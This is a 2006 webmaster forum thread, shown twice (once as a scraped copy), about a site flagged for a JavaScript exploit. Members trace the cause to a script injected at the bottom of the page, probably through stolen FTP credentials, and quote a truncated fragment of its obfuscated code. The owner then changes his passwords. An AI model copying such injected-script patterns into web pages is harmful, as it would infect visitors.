Trojan virus (dialer) from Xstash ????

amadman · 2006-09-25, 07:26 AM

My gf recieved a rejection letter from a members linklist that stated that they would not list the site because they got a trojan from xstash.

I emailed the list owner to see if they had received the trojan VBS/Psyme (dialer?) from a submited site and they said that their virus scanner was going off on xstash itself.

So I was wondering if other people (with protection) could visit http://xstash.com and see if they are getting warnings?
(I am not sure which scanner they are using at this time.)

Also I was wondering what could cause a false scan? Because I know that I have not put any trojans or the like on xstash.

Thanks in advance
Amadman

Fonz · 2006-09-25, 07:54 AM

I'm not getting any warnings either.
Maybe it was from a link they clicked that took them to a site that did have a trojan install on it?

amadman · 2006-09-25, 08:09 AM

Thanks for checking fonz.

That is what I thought too. But when I emailed them they said they were getting warnings at http://xstash.com/

It seems crazy. Can they be infected by something that makes it look like they are getting stuff from somewhere else?

HC-Majick · 2006-09-25, 09:01 AM

I get this when I go to xstash.com :

Malware detected
Exploit.JS.ADODB.Stream.v

Got the alert when I checked the last freesite you submitted as well as just now when I went to xtash

cd34 · 2006-09-25, 09:54 AM

there is a script at the bottom of the page that is typically inserted through FTP access to the account.

Code:

<script language="JavaScript">
e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2%

amadman · 2006-09-25, 10:05 AM

What the fuck?

Just checked the index of xstash.com and there was some javascript at the bottom of the source!

I know for sure that I did not put that there. How could this be done? Could my server be infected with something?

amadman · 2006-09-25, 10:07 AM

oops.. sorry sparky. I posted without checking replies.

Does that meen someone knows my ftp info?

MrYum · 2006-09-25, 10:11 AM

Quote:

Originally Posted by amadman

oops.. sorry sparky. I posted without checking replies.

Does that meen someone knows my ftp info?

Very likely...yes, your information has been compromised

I had this happen a few years ago. From what I was told, the fuckers were sniffing the ftp info through an unsecure login to the server. And the host wasn't smart enough to figure out how to stop them. Was hacked 7 times in a week

Definitely get your ftp info changed immediately!

Chop Smith · 2006-09-25, 10:25 AM

Happy Birthday.

Before reading the entire thread. I visted your site and surfed the categories pages. Norton did not detect anything so I assumed you had corrected the problem.

I recently had to change my server password and delete some old ftp accounts including the one set up for you. After reading cd34 updates about these virus, I plan to routinely change the pass on the server and ftp accounts.

amadman · 2006-09-25, 10:36 AM

Thanks Everyone! I got the password changed. Now I need to find what damage has been done.

Thanks Chop! With all the confusion I forgot it was my birthday. lol

I think I will start changing those often now too.

troy · 2006-09-25, 11:15 AM

Glad you found the problem Amadman.
I have added your freesite.

amadman · 2006-09-25, 11:44 AM

Great! Thanks Troy.

And thanks again for pointing this out to me.

2006-09-25, 07:26 AM	#1
amadman I've been mad for fucking years, absolutely years, been over the edge for yonks.... Join Date: Apr 2003 Location: padded room Posts: 861	Trojan virus (dialer) from Xstash ???? My gf recieved a rejection letter from a members linklist that stated that they would not list the site because they got a trojan from xstash. I emailed the list owner to see if they had received the trojan VBS/Psyme (dialer?) from a submited site and they said that their virus scanner was going off on xstash itself. So I was wondering if other people (with protection) could visit http://xstash.com and see if they are getting warnings? (I am not sure which scanner they are using at this time.) Also I was wondering what could cause a false scan? Because I know that I have not put any trojans or the like on xstash. Thanks in advance Amadman

2006-09-25, 07:54 AM	#2
Fonz Former pr0n slinger. Join Date: Aug 2003 Location: Antwerp, Belgium Posts: 7,929	I'm not getting any warnings either. Maybe it was from a link they clicked that took them to a site that did have a trojan install on it? __________________ See how I abuse little trees on my Shumi no Bonsai Blog

2006-09-25, 09:01 AM	#4
HC-Majick You can now put whatever you want in this space :) Join Date: Oct 2004 Location: Upstate NY Posts: 541	I get this when I go to xstash.com : Malware detected Exploit.JS.ADODB.Stream.v Got the alert when I checked the last freesite you submitted as well as just now when I went to xtash __________________ Submit Your Freesites:

2006-09-25, 09:54 AM	#5
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	there is a script at the bottom of the page that is typically inserted through FTP access to the account. Code: <script language="JavaScript"> e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2% __________________ SnapReplay.com a different way to share photos - iPhone & Android

2006-09-25, 10:25 AM	#9
Chop Smith Eighteen 'til I Die Join Date: Apr 2003 Location: Mississippi Posts: 2,168	Happy Birthday. Before reading the entire thread. I visted your site and surfed the categories pages. Norton did not detect anything so I assumed you had corrected the problem. I recently had to change my server password and delete some old ftp accounts including the one set up for you. After reading cd34 updates about these virus, I plan to routinely change the pass on the server and ftp accounts. __________________

2006-09-25, 08:09 AM	#3
amadman I've been mad for fucking years, absolutely years, been over the edge for yonks.... Join Date: Apr 2003 Location: padded room Posts: 861	Thanks for checking fonz. That is what I thought too. But when I emailed them they said they were getting warnings at http://xstash.com/ It seems crazy. Can they be infected by something that makes it look like they are getting stuff from somewhere else?

2006-09-25, 10:05 AM	#6
amadman I've been mad for fucking years, absolutely years, been over the edge for yonks.... Join Date: Apr 2003 Location: padded room Posts: 861	What the fuck? Just checked the index of xstash.com and there was some javascript at the bottom of the source! I know for sure that I did not put that there. How could this be done? Could my server be infected with something?

2006-09-25, 10:07 AM	#7
amadman I've been mad for fucking years, absolutely years, been over the edge for yonks.... Join Date: Apr 2003 Location: padded room Posts: 861	oops.. sorry sparky. I posted without checking replies. Does that meen someone knows my ftp info?

2006-09-25, 10:36 AM	#10
amadman I've been mad for fucking years, absolutely years, been over the edge for yonks.... Join Date: Apr 2003 Location: padded room Posts: 861	Thanks Everyone! I got the password changed. Now I need to find what damage has been done. Thanks Chop! With all the confusion I forgot it was my birthday. lol I think I will start changing those often now too.

2006-09-25, 11:15 AM	#11
troy I can spearhead the whole begging thing Join Date: Apr 2003 Location: nederlands Posts: 414	Glad you found the problem Amadman. I have added your freesite. __________________ Cumshot Specialist Great Porn

2006-09-25, 11:44 AM	#12
amadman I've been mad for fucking years, absolutely years, been over the edge for yonks.... Join Date: Apr 2003 Location: padded room Posts: 861	Great! Thanks Troy. And thanks again for pointing this out to me.